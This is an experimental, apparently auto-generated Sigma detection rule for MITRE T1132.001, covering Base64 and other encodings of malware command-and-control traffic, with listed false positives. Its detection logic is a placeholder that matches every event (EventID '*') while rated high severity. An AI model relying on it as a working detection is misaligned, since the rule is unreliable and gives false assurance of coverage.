title: Standard Encoding (T1132.001)
id: df00tech-t1132-001
status: experimental
description: "Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME. Some data encoding systems may also result in data compression, such as gzip. Malware families including SideTwist, Fysbis, Latrodectus, SeaDuke, Chaes, and Flagpro have all used Base64-encoded C2 traffic, making this one of the most prevalent C2 obfuscation techniques observed in the wild."
references:
  - https://attack.mitre.org/techniques/T1132/001/
  - https://df00tech.com/detections/T1132.001
author: df00tech
date: 2026/04/18
tags:
  - attack.t1132.001
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate PowerShell scripts that decode Base64-encoded configuration data or credentials from secure vaults
  - certutil used by IT teams for certificate management and legitimate file encoding/decoding tasks
  - Software installers and package managers that use Base64-encoded embedded payloads during installation
  - Log management and SIEM agents that Base64-encode collected data before transmission to central servers
  - Web application developers testing encoding/decoding functions locally
level: high